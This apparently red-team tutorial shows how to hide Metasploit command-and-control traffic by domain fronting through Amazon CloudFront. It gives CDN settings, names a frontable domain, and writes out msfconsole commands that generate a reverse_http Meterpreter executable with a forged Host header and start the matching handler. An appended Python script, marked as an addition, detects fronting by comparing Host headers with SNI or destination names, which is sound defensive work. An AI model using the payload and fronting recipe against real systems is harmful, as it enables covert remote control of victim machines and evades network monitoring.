Domain Fronting is a technique that is typically used for censorship evasion. It relies on popular Content Delivery Networks (CDNs) such as Amazon’s CloudFront to mask traffic origins. By changing the HTTP Host header, the CDN will happily route us to the correct server. Red Teams have been using this technique for hiding C2 traffic by using high reputation redirectors.
For more information on Domain Fronting, please refer to this whitepaper
Setting up CloudFront
Log in to AWS, and navigate to CloudFront. You will need a domain name that you own, or acquired for free from a registrar like Freenom. Once you are logged into AWS, click Create Distribution. The Origin Domain Name will be the domain that you own. You also need to set the origin protocol policy to match (HTTP/HTTPS), so that CloudFront routes both types of traffic to you.
Under Default Cache Behavior Settings, we need to tweak a few settings so that the CDN caches as little traffic as possible:
- Allow all HTTP methods.
- Cache Based on Selected Request Headers: select All.
- Forward Cookies: also select All.
- Query String Forwarding and Caching: select Forward all, cache based on all.
Everything else can be left at default. Click the Create Distribution button at the bottom of the page, and wait for the setup to complete within AWS.
This may take some time for AWS to propagate the correct settings to the edge servers. Go ahead with the meterpreter setup while this completes.
At the time of publishing, the Domain Fronting capability has not yet been pushed to the main distribution channels. Per the discussion here, Domain Fronting is only ready for certain payload types, and is not currently included in the main Metasploit framework. Rapid7 also hinted at Domain Fronting support in a recent blog.
Since this is not mainstream yet, we will need to grab the latest version from GitHub for payload generation. The server side needs no changes to handle Domain Fronting: it is the client that sets the Host header, which is all that is required to use the CDN as a redirector to our C2.
If you don’t already have a Metasploit development environment set up, there are excellent instructions here.
Choosing a Redirector
As we are using CloudFront for this demonstration, we can choose any popular domain that also utilizes CloudFront.
[Vincent](https://twitter.com/vysecurity) recently released a large list of frontable domains.
For simplicity’s sake, I’ve chosen abrakam.com as it’s the second domain in the CloudFront list.
Meterpreter Payload Generation
In your recently installed development environment with Metasploit, start up msfconsole.
```
use payload/windows/meterpreter/reverse_http
set LHOST abrakam.com
set LPORT 80
set HttpHostHeader d3k1m3cdd2g9qm.cloudfront.net
generate -t exe -f /tmp/meterpreter
```
Change the HttpHostHeader to the subdomain that AWS automatically populated for you during the distribution setup.
On the server that you control, also start up msfconsole.
```
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 0.0.0.0
set LPORT 80
exploit
```
The following is a screen capture of Wireshark as the agent is connecting to our meterpreter handler. As we used the reverse_http payload, you can inspect the HTTP traffic and see that simply by changing the Host header, we were able to redirect the payload to the server of our choice.
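What makes the capture above work is also what makes it visible to a defender: the name the client actually connected to (the resolved destination, or the TLS SNI for HTTPS) belongs to a different domain than the HTTP Host header. The following added example, not part of the original post, runs that check over constructed proxy-style log records; the `key=value` log layout and the `MULTI_PART_SLD` approximation of registrable domains are assumptions, and the names reuse abrakam.com and d3k1m3cdd2g9qm.cloudfront.net from above.

```python
from typing import AbstractSet, Dict, List, Tuple

# Constructed proxy/NSM log lines (not real traffic), one connection per line.
# sni is "-" for plaintext HTTP, where the only "outer" name is the one that was
# resolved and connected to (dst); for HTTPS the outer name is the TLS SNI.
SAMPLE_LOG = """\
ts=1 src=10.0.0.5 dst=abrakam.com sni=- host=d3k1m3cdd2g9qm.cloudfront.net uri=/ua_4zz
ts=2 src=10.0.0.5 dst=abrakam.com sni=- host=abrakam.com uri=/
ts=3 src=10.0.0.7 dst=example.com sni=example.com host=www.example.com uri=/index.html
ts=4 src=10.0.0.9 dst=cdn.example.net sni=cdn.example.net host=images.example.net:443 uri=/logo.png
"""

# Second-level labels under which 2-letter ccTLDs hand out names (e.g. example.co.uk); assumed list.
MULTI_PART_SLD = {"co", "com", "org", "net", "ac", "gov", "edu"}

def parse_line(line: str) -> Dict[str, str]:
    """Split 'key=value key=value ...' into a dict (values may themselves contain '=')."""
    return dict(kv.split("=", 1) for kv in line.split())

def registrable_domain(name: str) -> str:
    """Lowercase, drop any :port, and keep the registrable part (eTLD+1, approximated)."""
    labels = name.lower().rsplit(":", 1)[0].rstrip(".").split(".")
    keep = 3 if len(labels) >= 3 and len(labels[-1]) == 2 and labels[-2] in MULTI_PART_SLD else 2
    return ".".join(labels[-keep:])

def outer_name(rec: Dict[str, str]) -> str:
    """Name the client actually connected to: TLS SNI if present, else the resolved destination."""
    return rec["dst"] if rec.get("sni", "-") == "-" else rec["sni"]

def is_fronting_suspect(rec: Dict[str, str], allow: AbstractSet[Tuple[str, str]] = frozenset()) -> bool:
    """Flag a request whose Host header is in a different registrable domain than the outer name."""
    outer = registrable_domain(outer_name(rec))
    inner = registrable_domain(rec["host"])
    return outer != inner and (outer, inner) not in allow  # allow = known-good (outer, inner) pairs

def find_suspects(log_text: str, allow: AbstractSet[Tuple[str, str]] = frozenset()) -> List[Dict[str, str]]:
    """Return the suspicious records, enriched with the two names that disagree."""
    out = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if is_fronting_suspect(rec, allow):
            out.append({"ts": rec["ts"], "src": rec["src"], "outer": outer_name(rec), "host": rec["host"]})
    return out

if __name__ == "__main__":
    for hit in find_suspects(SAMPLE_LOG):
        print(f"ts={hit['ts']} {hit['src']} connected to {hit['outer']} but sent Host: {hit['host']}")
```

Only the first record is flagged: the www/apex and cdn/images pairs share a registrable domain, so ordinary CDN usage does not trigger the check.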
Keep an eye out for new payloads supporting the extended HttpHost options in the advanced settings of Metasploit.